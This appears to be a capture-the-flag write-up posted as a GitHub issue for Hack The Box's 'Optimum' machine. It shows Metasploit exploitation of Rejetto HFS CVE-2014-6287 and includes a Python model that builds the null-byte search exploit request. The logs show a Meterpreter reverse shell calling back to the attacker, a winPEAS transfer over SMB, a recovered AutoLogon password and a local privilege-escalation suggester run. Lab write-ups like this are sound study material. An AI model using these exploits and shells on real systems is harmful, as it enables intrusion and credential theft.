Open roaris opened 6 months ago
Clicking Login prompts for Basic auth.
I checked whether SecLists has credentials for it; there don't seem to be any.
httpfileserver default credentials
Searching for that turned up that there are no default credentials.
https://rejetto.com/forum/index.php?topic=5093.0
httpfileserver 2.3 exploit
Searching for that turned up https://www.exploit-db.com/exploits/39161 (CVE-2014-6287).
Reading the code, it sends requests to /search.
Search works without going through Basic auth, so that is not a problem.
Use exploit/windows/http/rejetto_hfs_exec.
Looking at options, there are required parameters SRVHOST and SRVPORT, but since I don't understand what the exploit does, I don't know what these values are.
msf6 exploit(windows/http/rejetto_hfs_exec) > options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.23.73.202 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
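An added example, not from the original issue and not the Metasploit module's or HFS's own code: a Python model of what the exploit chain does. CVE-2014-6287 is a null-byte bypass: in HFS 2.3x before 2.3c, findMacroMarker in parserLib.pas stopped scanning the search value at the first NUL, so a `%00{.exec|...}` sent to the unauthenticated search action (`/?search=`) was never neutralised but was still evaluated by the macro engine, which runs the command as the account running hfs.exe (here kostas, whose desktop holds hfs.exe; this is why the shell lands as kostas and privilege escalation comes next). SRVHOST and SRVPORT are the bind address and port of the small HTTP server that msfconsole itself starts to host the staged payload; the injected command fetches the payload from it, which is what the "Using URL: http://10.10.16.3:8081/..." and "Payload request received" lines in the exploit run show, and why SRVPORT must be a port that is free on the attacking host. The sanitizer and engine below are simplified models of that scan-range bug, not HFS's Delphi code; the `cmd.exe|param=` form of the exec macro and the space-insertion neutralisation are assumptions of the model.

```python
"""Model of CVE-2014-6287 (Rejetto HFS 2.3x before 2.3c), added for this note.

NVD's description: the findMacroMarker function in parserLib.pas allows remote
attackers to execute arbitrary programs via a %00 sequence in a search action.
The functions marked MODEL are simplified Python stand-ins for HFS's macro
filter and macro engine, not the original Delphi code.
"""
import re
from urllib.parse import quote, unquote

# HFS macro syntax is {.name|arg|...}.  The exec macro with a param= argument is
# the form used here; the exact argument spelling is an assumption of this model.
HFS_EXEC = re.compile(r"\{\.exec\|([^|]+)\|param=(.*?)\.\}")


def build_search_request(command: str, host: str = "10.10.10.8", port: int = 80) -> str:
    """Raw HTTP request against the unauthenticated search action.

    %00 is the CVE: the filter stops at the NUL, the macro engine does not.
    """
    macro = f"{{.exec|cmd.exe|param=/c {command}.}}"
    path = "/?search=%00" + quote(macro, safe="{}|=/")
    return f"GET {path} HTTP/1.1\r\nHost: {host}:{port}\r\n\r\n"


def search_param(request: str) -> str:
    """URL-decode the ?search= value the way the server does before filtering."""
    path = request.split(" ", 2)[1]
    return unquote(path.split("?search=", 1)[1])


def neutralise(text: str) -> str:
    # MODEL: break the markers so the engine no longer recognises a macro.
    # HFS's own escaping differs; only the scanned range matters for the bug.
    return text.replace("{.", "{ .").replace(".}", ". }")


def sanitize_vulnerable(query: str) -> str:
    """MODEL of the pre-2.3c filter: only the text before the first NUL is scanned."""
    head, nul, tail = query.partition("\x00")
    return neutralise(head) + nul + tail


def sanitize_fixed(query: str) -> str:
    """MODEL of a correct filter: drop NUL so nothing downstream treats it as a
    terminator, then scan the whole string."""
    return neutralise(query.replace("\x00", ""))


def commands_run(query: str) -> list[str]:
    """MODEL of the macro engine: every surviving exec macro runs as the HFS user."""
    return [f"{exe} {param}" for exe, param in HFS_EXEC.findall(query)]


def simulate(request: str, fixed: bool) -> list[str]:
    """Commands the server would execute for one request, old filter vs fixed."""
    query = search_param(request)
    return commands_run(sanitize_fixed(query) if fixed else sanitize_vulnerable(query))


if __name__ == "__main__":
    req = build_search_request("whoami")
    print(req.splitlines()[0])
    print("pre-2.3c:", simulate(req, fixed=False))  # the command runs
    print("2.3c    :", simulate(req, fixed=True))   # nothing runs
```

Without the `%00` the old filter catches the macro too, which is the whole content of the CVE: the filter and the engine disagreed about where the string ends.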
8080 was in use by Burp, so I set SRVPORT to 8081. Reverse shell succeeded. user.txt is found right away.
msf6 exploit(windows/http/rejetto_hfs_exec) > set SRVPORT 8081
SRVPORT => 8081
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 10.10.16.3:4444
[*] Using URL: http://10.10.16.3:8081/FCabutCP7v
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /FCabutCP7v
[*] Sending stage (176198 bytes) to 10.10.10.8
[!] Tried to delete %TEMP%\jBaaLVQfIT.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.16.3:4444 -> 10.10.10.8:49162) at 2024-02-28 23:28:22 +0900
[*] Server stopped.
meterpreter > shell
Process 1832 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>whoami
whoami
optimum\kostas
C:\Users\kostas\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is EE82-226D
Directory of C:\Users\kostas\Desktop
06/03/2024 01:26 <DIR> .
06/03/2024 01:26 <DIR> ..
06/03/2024 01:26 <DIR> %TEMP%
18/03/2017 02:11 760.320 hfs.exe
06/03/2024 12:46 34 user.txt
2 File(s) 760.354 bytes
3 Dir(s) 5.621.055.488 bytes free
C:\Users\Administrator is not accessible; privilege escalation is needed.
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is EE82-226D
Directory of C:\Users
18/03/2017 01:57 <DIR> .
18/03/2017 01:57 <DIR> ..
18/03/2017 01:52 <DIR> Administrator
18/03/2017 01:57 <DIR> kostas
22/08/2013 05:39 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 5.634.265.088 bytes free
C:\Users>cd Administrator
cd Administrator
Access is denied.
Apparently there is a tool called WinPEAS for privilege escalation on Windows. An article that tries it out: https://medium.com/@s12deff/windows-privilege-escalation-with-winpeas-94be6fb0f173
I don't know how to get the executable onto the box. On Linux I'd use wget, but what about Windows? Starting powershell and typing commands just hangs.
C:\Users\kostas\Desktop>powershell
powershell
Windows PowerShell
Copyright (C) 2014 Microsoft Corporation. All rights reserved.
PS C:\Users\kostas\Desktop> pwd
(no response)
Looking at https://0xdf.gitlab.io/2021/03/17/htb-optimum.html, they did it over SMB. Starting an SMB server: https://qiita.com/Hashibirokou/items/5fbb2e94ca42434e4575#smb%E3%82%B5%E3%83%BC%E3%83%90
Kali side
┌──(roaris㉿DESKTOP-G3SGKDT)-[~/htb/machine/retired/Optimum]
└─$ ls
winPEASx64.exe
┌──(roaris㉿DESKTOP-G3SGKDT)-[~/htb/machine/retired/Optimum]
└─$ sudo impacket-smbserver share . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Target side
C:\Users\kostas\Desktop>copy \\10.10.16.3\share\winPEASx64.exe
copy \\10.10.16.3\share\winPEASx64.exe
1 file(s) copied.
C:\Users\kostas\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is EE82-226D
Directory of C:\Users\kostas\Desktop
06/03/2024 02:43 <DIR> .
06/03/2024 02:43 <DIR> ..
06/03/2024 02:41 <DIR> %TEMP%
18/03/2017 02:11 760.320 hfs.exe
06/03/2024 12:46 34 user.txt
26/02/2024 09:57 2.387.456 winPEASx64.exe
3 File(s) 3.147.810 bytes
3 Dir(s) 5.631.569.920 bytes free
Usage: https://github.com/carlospolop/PEASS-ng/blob/master/winPEAS/winPEASexe/README.md#parameters-examples
Running it with no arguments produced an absurd amount of error logging, so I specified only systeminfo userinfo (still this much, though...).
C:\Users\kostas\Desktop>winPEASx64.exe systeminfo userinfo
winPEASx64.exe systeminfo userinfo
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
((((((((((((((((((((((((((((((((
(((((((((((((((((((((((((((((((((((((((((((
((((((((((((((**********/##########(((((((((((((
((((((((((((********************/#######(((((((((((
((((((((******************/@@@@@/****######((((((((((
((((((********************@@@@@@@@@@/***,####((((((((((
(((((********************/@@@@@%@@@@/********##(((((((((
(((############*********/%@@@@@@@@@/************((((((((
((##################(/******/@@@@@/***************((((((
((#########################(/**********************(((((
((##############################(/*****************(((((
((###################################(/************(((((
((#######################################(*********(((((
((#######(,.***.,(###################(..***.*******(((((
((#######*(#####((##################((######/(*****(((((
((###################(/***********(##############()(((((
(((#####################/*******(################)((((((
((((############################################)((((((
(((((##########################################)(((((((
((((((########################################)(((((((
((((((((####################################)((((((((
(((((((((#################################)(((((((((
((((((((((##########################)(((((((((
((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((
ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own devices and/or with the device owner's permission.
WinPEAS-ng by @hacktricks_live
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
[+] Legend:
Red Indicates a special privilege over an object or something is misconfigured
Green Indicates that some protection is enabled or something is well configured
Cyan Indicates active users
Blue Indicates disabled users
LightYellow Indicates links
You can find a Windows local PE Checklist here: https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation
Creating Dynamic lists, this could take a while, please wait...
- Loading sensitive_files yaml definitions file...
- Loading regexes yaml definitions file...
- Checking if domain...
- Getting Win32_UserAccount info...
- Creating current user groups list...
- Creating active users list (local only)...
- Creating disabled users list...
- Admin users list...
- Creating AppLocker bypass list...
- Creating files/directories list for search...
[skipped, file search is disabled]
System Information
Basic System Information
Check if the Windows versions is vulnerable to some known exploit https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
System Type: x64-based PC
Hostname: optimum
ProductName: Windows Server 2012 R2 Standard
EditionID: ServerStandard
ReleaseId:
BuildBranch:
CurrentMajorVersionNumber:
CurrentVersion: 6.3
Architecture: AMD64
ProcessorCount: 2
SystemLang: en-US
KeyboardLang: English (United States)
TimeZone: (UTC+02:00) Athens, Bucharest
IsVirtualMachine: True
Current Time: 6/3/2024 3:17:36
HighIntegrity: False
PartOfDomain: False
Hotfixes: KB2959936, KB2896496, KB2919355, KB2920189, KB2928120, KB2931358, KB2931366, KB2933826, KB2938772, KB2949621, KB2954879, KB2958262, KB2958263, KB2961072, KB2965500, KB2966407, KB2967917, KB2971203, KB2971850, KB2973351, KB2973448, KB2975061, KB2976627, KB2977629, KB2981580, KB2987107, KB2989647, KB2998527, KB3000850, KB3003057, KB3014442,
[?] Windows vulns search powered by Watson(https://github.com/rasta-mouse/Watson)
[!] Windows version not supported, build number: '9600'
Showing All Microsoft Updates
[X] Exception: Exception has been thrown by the target of an invocation.
System Last Shutdown Date/time (from Registry)
Last Shutdown Date/time : 27/12/2022 2:59:45
User Environment Variables
Check for some passwords or keys in the env variables
COMPUTERNAME: OPTIMUM
USERPROFILE: C:\Users\kostas
HOMEPATH: \Users\kostas
LOCALAPPDATA: C:\Users\kostas\AppData\Local
PSModulePath: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
PROCESSOR_ARCHITECTURE: AMD64
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ProgramFiles(x86): C:\Program Files (x86)
PROCESSOR_LEVEL: 6
LOGONSERVER: \\OPTIMUM
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
HOMEDRIVE: C:
SystemRoot: C:\Windows
SESSIONNAME: Console
ALLUSERSPROFILE: C:\ProgramData
PUBLIC: C:\Users\Public
FP_NO_HOST_CHECK: NO
APPDATA: C:\Users\kostas\AppData\Roaming
PROCESSOR_REVISION: 5507
USERNAME: kostas
CommonProgramW6432: C:\Program Files\Common Files
CommonProgramFiles: C:\Program Files\Common Files
OS: Windows_NT
USERDOMAIN_ROAMINGPROFILE: OPTIMUM
PROCESSOR_IDENTIFIER: Intel64 Family 6 Model 85 Stepping 7, GenuineIntel
ComSpec: C:\Windows\system32\cmd.exe
PROMPT: $P$G
SystemDrive: C:
TEMP: C:\Users\kostas\AppData\Local\Temp
ProgramFiles: C:\Program Files
NUMBER_OF_PROCESSORS: 2
TMP: C:\Users\kostas\AppData\Local\Temp
ProgramData: C:\ProgramData
ProgramW6432: C:\Program Files
windir: C:\Windows
USERDOMAIN: OPTIMUM
System Environment Variables
Check for some passwords or keys in the env variables
FP_NO_HOST_CHECK: NO
USERNAME: SYSTEM
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
ComSpec: C:\Windows\system32\cmd.exe
TMP: C:\Windows\TEMP
OS: Windows_NT
windir: C:\Windows
PROCESSOR_ARCHITECTURE: AMD64
TEMP: C:\Windows\TEMP
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PSModulePath: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 6
PROCESSOR_IDENTIFIER: Intel64 Family 6 Model 85 Stepping 7, GenuineIntel
PROCESSOR_REVISION: 5507
Audit Settings
Check what is being logged
Not Found
Audit Policy Settings - Classic & Advanced
WEF Settings
Windows Event Forwarding, is interesting to know were are sent the logs
Not Found
LAPS Settings
If installed, local administrator password is changed frequently and is restricted by ACL
LAPS Enabled: LAPS not installed
Wdigest
If enabled, plain-text crds could be stored in LSASS https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#wdigest
Wdigest is not enabled
LSA Protection
If enabled, a driver is needed to read LSASS memory (If Secure Boot or UEFI, RunAsPPL cannot be disabled by deleting the registry key) https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#lsa-protection
LSA Protection is not enabled
Credentials Guard
If enabled, a driver is needed to read LSASS memory https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#credential-guard
CredentialGuard is not enabled
[X] Exception: [X] 'Win32_DeviceGuard' WMI class unavailable
Cached Creds
If > 0, credentials will be cached in the registry and accessible by SYSTEM user https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#cached-credentials
cachedlogonscount is 10
Enumerating saved credentials in Registry (CurrentPass)
AV Information
[X] Exception: Invalid namespace
No AV was detected!!
Not Found
Windows Defender configuration
Local Settings
Group Policy Settings
UAC Status
If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
EnableLUA: 1
LocalAccountTokenFilterPolicy:
FilterAdministratorToken: 0
[*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
[-] Only the RID-500 local admin account can be used for lateral movement.
PowerShell Settings
PowerShell v2 Version: 2.0
PowerShell v5 Version: 4.0
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file:
PS history size:
Enumerating PowerShell Session Settings using the registry
You must be an administrator to run this check
PS default transcripts history
Read the PS history inside these files (if any)
HKCU Internet Settings
User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
IE5_UA_Backup_Flag: 5.0
ZonesSecurityUpgrade: System.Byte[]
EmailName: User@
AutoConfigProxy: wininet.dll
MimeExclusionListForCache: multipart/mixed multipart/x-mixed-replace multipart/x-byteranges
WarnOnPost: System.Byte[]
UseSchannelDirectly: System.Byte[]
EnableHttp1_1: 1
UrlEncoding: 0
SecureProtocols: 2720
PrivacyAdvanced: 0
DisableCachingOfSSLPages: 0
WarnonZoneCrossing: 0
CertificateRevocation: 1
EnableNegotiate: 1
MigrateProxy: 1
ProxyEnable: 0
HKLM Internet Settings
CodeBaseSearchPath: CODEBASE
EnablePunycode: 1
WarnOnIntranet: 1
MinorVersion: 0
ActiveXCache: C:\Windows\Downloaded Program Files
Drives Information
Remember that you should search more info inside the other drives
C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 5 GB)(Permissions: Users [AppendData/CreateDirectories])
Checking WSUS
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus
Not Found
Checking KrbRelayUp
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#krbrelayup
The system isn't inside a domain, so it isn't vulnerable
Checking If Inside Container
If the binary cexecsvc.exe or associated service exists, you are inside Docker
You are NOT inside a container
Checking AlwaysInstallElevated
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
AlwaysInstallElevated isn't available
Enumerate LSA settings - auth packages included
Bounds : 00-30-00-00-00-20-00-00
auditbasedirectories : 0
fullprivilegeauditing : 00
crashonauditfail : 0
auditbaseobjects : 0
Security Packages : ""
LimitBlankPasswordUse : 1
NoLmHash : 1
Notification Packages : rassfm,scecli
Authentication Packages : msv1_0
LsaPid : 492
SecureBoot : 1
ProductType : 7
disabledomaincreds : 0
everyoneincludesanonymous : 0
forceguest : 0
restrictanonymous : 0
restrictanonymoussam : 1
Enumerating NTLM Settings
LanmanCompatibilityLevel : (Send NTLMv2 response only - Win7+ default)
NTLM Signing Settings
ClientRequireSigning : False
ClientNegotiateSigning : True
ServerRequireSigning : False
ServerNegotiateSigning : False
LdapSigning : Negotiate signing (Negotiate signing)
Session Security
NTLMMinClientSec : 536870912 (Require 128-bit encryption)
NTLMMinServerSec : 536870912 (Require 128-bit encryption)
NTLM Auditing and Restrictions
InboundRestrictions : (Not defined)
OutboundRestrictions : (Not defined)
InboundAuditing : (Not defined)
OutboundExceptions :
Display Local Group Policy settings - local users/machine
Checking AppLocker effective policy
AppLockerPolicy version: 1
listing rules:
Enumerating Printers (WMI)
Name: Microsoft XPS Document Writer
Status: Unknown
Sddl: O:SYD:(A;OIIO;GA;;;CO)(A;OIIO;GA;;;AC)(A;;SWRC;;;WD)(A;CIIO;GX;;;WD)(A;;SWRC;;;AC)(A;CIIO;GX;;;AC)(A;;LCSWDTSDRCWDWO;;;BA)(A;OICIIO;GA;;;BA)
Is default: True
Is network printer: False
=================================================================================================
Enumerating Named Pipes
Name CurrentUserPerms Sddl
eventlog Everyone [WriteData/CreateFiles] O:LSG:LSD:P(A;;0x12019b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122)
vgauth-service Everyone [WriteData/CreateFiles] O:BAG:SYD:P(A;;0x12019f;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)
Enumerating AMSI registered providers
Enumerating Sysmon configuration
You must be an administrator to run this check
Enumerating Sysmon process creation logs (1)
You must be an administrator to run this check
Installed .NET versions
CLR Versions
4.0.30319
.NET Versions
4.5.51641
.NET & AMSI (Anti-Malware Scan Interface) support
.NET version supports AMSI : False
OS supports AMSI : False
Users Information
Users
Check if you have some admin equivalent privileges https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#users-and-groups
Current user: kostas
Current groups: Domain Users, Everyone, Users, Interactive, Console Logon, Authenticated Users, This Organization, Local account, Local, NTLM Authentication
=================================================================================================
OPTIMUM\Administrator: Built-in account for administering the computer/domain
|->Groups: Administrators
|->Password: CanChange-Expi-Req
OPTIMUM\Guest(Disabled): Built-in account for guest access to the computer/domain
|->Groups: Guests
|->Password: NotChange-NotExpi-NotReq
OPTIMUM\kostas
|->Groups: Users
|->Password: CanChange-NotExpi-Req
Current User Idle Time
Current User : OPTIMUM\kostas
Idle Time : 00h:21m:44s:859ms
Display Tenant information (DsRegCmd.exe /status)
Current Token privileges
Check if you can escalate privilege using some enabled token https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#token-manipulation
SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeIncreaseWorkingSetPrivilege: DISABLED
Clipboard text
Logged users
OPTIMUM\kostas
Display information about local users
Computer Name : OPTIMUM
User Name : Administrator
User Id : 500
Is Enabled : True
User Type : Administrator
Comment : Built-in account for administering the computer/domain
Last Logon : 6/3/2024 2:56:43
Logons Count : 85
Password Last Set : 18/3/2017 1:51:34
=================================================================================================
Computer Name : OPTIMUM
User Name : Guest
User Id : 501
Is Enabled : False
User Type : Guest
Comment : Built-in account for guest access to the computer/domain
Last Logon : 1/1/1970 12:00:00
Logons Count : 0
Password Last Set : 1/1/1970 12:00:00
=================================================================================================
Computer Name : OPTIMUM
User Name : kostas
User Id : 1001
Is Enabled : True
User Type : User
Comment :
Last Logon : 6/3/2024 2:56:05
Logons Count : 12
Password Last Set : 18/3/2017 1:56:19
=================================================================================================
RDP Sessions
SessID pSessionName pUserName pDomainName State SourceIP
1 Console kostas OPTIMUM Active
Ever logged users
OPTIMUM\Administrator
OPTIMUM\kostas
Home folders found
C:\Users\Administrator
C:\Users\All Users
C:\Users\Default
C:\Users\Default User
C:\Users\kostas : kostas [AllAccess]
C:\Users\Public : Interactive [WriteData/CreateFiles]
Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultUserName : kostas
DefaultPassword : kdeEjDowkS*
Password Policies
Check for a possible brute-force
Domain: Builtin
SID: S-1-5-32
MaxPasswordAge: 42.22:47:31.7437440
MinPasswordAge: 00:00:00
MinPasswordLength: 0
PasswordHistoryLength: 0
PasswordProperties: 0
=================================================================================================
Domain: OPTIMUM
SID: S-1-5-21-605891470-2991919448-81205106
MaxPasswordAge: 42.00:00:00
MinPasswordAge: 00:00:00
MinPasswordLength: 0
PasswordHistoryLength: 0
PasswordProperties: DOMAIN_PASSWORD_COMPLEX
=================================================================================================
Print Logon Sessions
Method: WMI
Logon Server:
Logon Server Dns Domain:
Logon Id: 225699
Logon Time:
Logon Type: 0
Start Time: 1/1/1601 2:00:00
Domain: OPTIMUM
Authentication Package:
Start Time: 1/1/1601 2:00:00
User Name: kostas
User Principal Name:
User SID:
=================================================================================================
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
Proceeding with reference to https://qiita.com/GenkaiChan/items/7039fdbe84d5c33ce90e
With multi/recon/local_exploit_suggester you can apparently enumerate vulnerabilities on a machine you already have a shell on. Run it specifying the session in which you got the shell. How to use sessions: https://gintachan.com/metasploit-use-module-run/
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 10.10.16.3:4444
[*] Using URL: http://10.10.16.3:8080/Y1YmiJa
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /Y1YmiJa
[*] Sending stage (176198 bytes) to 10.10.10.8
[!] Tried to delete %TEMP%\YzgsetTrj.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.16.3:4444 -> 10.10.10.8:49166) at 2024-03-04 23:59:57 +0900
[*] Server stopped.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/http/rejetto_hfs_exec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows OPTIMUM\kostas @ OPTIMUM 10.10.16.3:4444 -> 10.10.10.8:49166 (10.10.10.8)
msf6 exploit(windows/http/rejetto_hfs_exec) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
View the full module info with the info, or info -d command.
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > set SHOWDESCRIPTION true
SHOWDESCRIPTION => true
msf6 post(multi/recon/local_exploit_suggester) > exploit
[*] 10.10.10.8 - Collecting local exploits for x86/windows...
[*] 10.10.10.8 - 193 exploit checks are being tried...
[+] 10.10.10.8 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
This module will bypass Windows UAC by hijacking a special key in
the Registry under the current user hive, and inserting a custom
command that will get invoked when the Windows Event Viewer is
launched. It will spawn a second shell that has the UAC flag turned
off. This module modifies a registry key, but cleans up the key once
the payload has been invoked. The module does not require the
architecture of the payload to match the OS. If specifying
EXE::Custom your DLL should call ExitProcess() after starting your
payload in a separate process.
[+] 10.10.10.8 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
This module will bypass UAC on Windows 8-10 by hijacking a special
key in the Registry under the Current User hive, and inserting a
custom command that will get invoked when any binary (.exe)
application is launched. But slui.exe is an auto-elevated binary
that is vulnerable to file handler hijacking. When we run slui.exe
with changed Registry key
(HKCU:\Software\Classes\exefile\shell\open\command), it will run our
custom command as Admin instead of slui.exe. The module modifies the
registry in order for this exploit to work. The modification is
reverted once the exploitation attempt has finished. The module does
not require the architecture of the payload to match the OS. If
specifying EXE::Custom your DLL should call ExitProcess() after
starting the payload in a different process.
[+] 10.10.10.8 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!
This module exploits CVE-2020-0787, an arbitrary file move
vulnerability in outdated versions of the Background Intelligent
Transfer Service (BITS), to overwrite
C:\Windows\System32\WindowsCoreDeviceInfo.dll with a malicious DLL
containing the attacker's payload. To achieve code execution as the
SYSTEM user, the Update Session Orchestrator service is then
started, which will result in the malicious
WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a
DLL hijacking issue within the Update Session Orchestrator Service.
Note that presently this module only works on Windows 10 and Windows
Server 2016 and later as the Update Session Orchestrator Service was
only introduced in Windows 10. Note that only Windows 10 has been
tested, so your mileage may vary on Windows Server 2016 and later.
[+] 10.10.10.8 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
This module exploits the lack of sanitization of standard handles in
Windows' Secondary Logon Service. The vulnerability is known to
affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This
module will only work against those versions of Windows with
Powershell 2.0 or later and systems with two or more CPU cores.
[+] 10.10.10.8 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
This module leverages a UAC bypass (TokenMagic) in order to spawn a
process/conduct a DLL hijacking attack to gain SYSTEM-level
privileges. Windows 7 through Windows 10 1803 are affected.
[*] Running check method for exploit 41 / 41
[*] 10.10.10.8 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_sluihijack Yes The target appears to be vulnerable.
3 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!
4 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
5 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable.
6 exploit/windows/local/adobe_sandbox_adobecollabsync No Cannot reliably check exploitability.
7 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
8 exploit/windows/local/always_install_elevated No The target is not exploitable.
9 exploit/windows/local/anyconnect_lpe No The target is not exploitable. vpndownloader.exe not found on file system
10 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
11 exploit/windows/local/bthpan No The target is not exploitable.
12 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
13 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
14 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
15 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
16 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
17 exploit/windows/local/ikeext_service No The check raised an exception.
18 exploit/windows/local/ipass_launch_app No The check raised an exception.
19 exploit/windows/local/lenovo_systemupdate No The check raised an exception.
20 exploit/windows/local/lexmark_driver_privesc No The check raised an exception.
21 exploit/windows/local/mqac_write No The target is not exploitable.
22 exploit/windows/local/ms10_015_kitrap0d No The target is not exploitable.
